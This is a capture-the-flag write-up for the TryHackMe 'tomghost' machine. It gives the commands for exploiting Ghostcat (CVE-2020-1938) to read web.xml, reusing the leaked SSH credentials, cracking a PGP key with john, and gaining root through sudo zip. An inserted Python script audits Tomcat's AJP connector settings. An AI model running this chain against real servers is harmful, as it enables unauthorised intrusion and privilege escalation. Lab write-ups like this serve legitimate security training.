tomghost - TryHackMe

Identify recent vulnerabilities to try to exploit the system or read files that you should not have access to.

Difficulty: Easy

Reconnaissance

We start with an nmap scan using the -A option, which enables OS detection, version detection, script scanning and traceroute.

$ nmap -A 10.10.52.86

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods:
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
|_http-open-proxy: Proxy might be redirecting requests
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The scan shows an open ajp13 service on port 8009. Given the name of the machine, we will have to exploit an Apache Tomcat vulnerability. With a little research, we quickly come across CVE-2020-1938, known as Ghostcat. An exploit for this vulnerability is available on GitHub.
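Seen from the defender's side, the exposure above comes down to the AJP connector entry in Tomcat's server.xml. The following audit is an added example, not part of the original write-up or of any tool it uses; the sample configurations and the secret value are constructed, and the fixed-version numbers and attribute names are taken from Apache's CVE-2020-1938 advisory and Tomcat's connector documentation rather than from this page.

```python
import xml.etree.ElementTree as ET

# First releases carrying the Ghostcat fix (Apache advisory for CVE-2020-1938).
FIXED = {7: (7, 0, 100), 8: (8, 5, 51), 9: (9, 0, 31)}
LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Constructed sample: an AJP connector as older default configs shipped it.
EXPOSED = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1" />
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
</Service></Server>"""

# Constructed sample: same connector, loopback-only with a placeholder secret.
HARDENED = """<Server><Service name="Catalina">
  <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
             secret="PLACEHOLDER-SECRET" secretRequired="true" />
</Service></Server>"""


def is_patched(version: str) -> bool:
    """True if a plain x.y.z Tomcat version ships the hardened AJP defaults."""
    parts = tuple(int(p) for p in version.split(".")[:3])
    fixed = FIXED.get(parts[0])
    return parts >= fixed if fixed else parts[0] > 9


def audit_ajp(server_xml: str, version: str) -> list[str]:
    """Return findings for each active AJP connector (XML comments are skipped)."""
    findings, patched = [], is_patched(version)
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if "ajp" not in conn.get("protocol", "").lower():
            continue  # HTTP connectors are out of scope
        port = conn.get("port", "?")
        if not patched:
            findings.append(f"AJP {port}: Tomcat {version} predates the fix")
        # Pre-fix releases listen on all interfaces unless 'address' is set.
        address = conn.get("address")
        if (address is None and not patched) or (address and address not in LOOPBACK):
            findings.append(f"AJP {port}: listens beyond loopback")
        # 'secret' (older name 'requiredSecret') is a shared value peers must send.
        has_secret = bool(conn.get("secret") or conn.get("requiredSecret"))
        optional = not patched or conn.get("secretRequired", "true").lower() == "false"
        if not has_secret and optional:
            findings.append(f"AJP {port}: no shared secret enforced")
    return findings


if __name__ == "__main__":
    for line in audit_ajp(EXPOSED, "9.0.30"):
        print(line)
```

A connector that is commented out in server.xml produces no findings, which matches how fixed releases ship it by default.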

Apache Tomcat servers have a /WEB-INF/web.xml file by default, so we will try to read that file with the exploit.

$ python3 ajpShooter.py http://10.10.52.86:8080 8009 /WEB-INF/web.xml read

In this file, we find what seems to be an account:

Welcome to GhostCat
skyfuck:[redacted]

We try to connect to the server over SSH with these credentials, and it works. Once connected, there are 2 files in the user's home directory: credential.pgp and tryhackme.asc.

  • credential.pgp is a binary file.
  • tryhackme.asc is a PGP private key.

1. Compromise this machine and obtain user.txt

To find the user.txt file, I keep things simple and use the find command. Our permissions allow us to read the file, so we can display the flag and validate it.

$ find / -type f -name "user.txt" 2>/dev/null
/home/merlin/user.txt

$ cat /home/merlin/user.txt
[redacted]

2. Escalate privileges and obtain root.txt

The private key found earlier is surely not there by chance, so I copy it to my machine.

$ scp skyfuck@10.10.52.86:/home/skyfuck/* .

Once recovered, we run the key through John. To do this, we must first convert it with the gpg2john tool.

$ gpg2john tryhackme.asc > gpgjohn

$ john --wordlist=/usr/share/wordlists/rockyou.txt gpgjohn
[redacted]

This gives us the password needed to decrypt the PGP file. We must first import the key.

$ gpg --import tryhackme.asc

We confirm with the password found earlier. Once imported, we can decrypt the PGP file.

$ gpg -d credential.pgp

gpg: Warning: the CAST5 encryption algorithm cannot be found in the recipient preferences

gpg: encrypted with a 1024-bit ELG key, identifier 61E104A66184FBCC, created on 2020-03-11

« tryhackme stuxnet@tryhackme.com »

merlin:[redacted]

Of course, with these credentials, you can open an SSH session.

The goal now is to get the contents of the root.txt file.

The first step is to check sudo -l:

merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip

So we can run the /usr/bin/zip binary as root. A quick look at GTFOBins shows that this lets us escalate our privileges. Following the procedure, we become root and can display the root.txt file.

merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)

# id
uid=0(root) gid=0(root) groups=0(root)

# cat /root/root.txt
THM{[redacted]}

Happy Hacking! 🎉